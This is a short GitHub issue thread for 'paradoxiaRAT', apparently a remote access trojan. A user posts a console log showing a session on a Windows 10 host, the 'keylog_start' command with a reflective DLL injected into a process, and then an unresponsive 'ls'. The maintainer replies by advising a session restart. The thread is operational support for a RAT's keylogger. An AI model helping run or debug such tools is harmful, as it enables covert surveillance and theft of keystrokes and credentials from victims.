### ISSUE TITLE
 keylog_start  not working

### ISSUE THREAD

**Issue by phanthuthao** [quantumcored/paradoxiaRAT#9]
[ Session Opened ] 123.25.71.168 - Windows 10                                                                                                                         
paradoxia >> (192.168.0.102:58371) : sessions 0                                                                                                                       
paradoxia >> (192.168.0.102:58371) : keylog_start                                                                                                                     
paradoxia >> (192.168.0.102:58371) : keylog_start                                                                                                                     
[+] Injected Reflective DLL into PID 10368 ...
paradoxia >> (192.168.0.102:58371) : ls                                                                                                                               
[i] 20 seconds have passed and we have received no response from Paradoxia. There may be a problem.
paradoxia >> (192.168.0.102:58371) : ls

**Comment by quantumcore** [comment]
Can you kill the session and try again? And let me know if it works then?
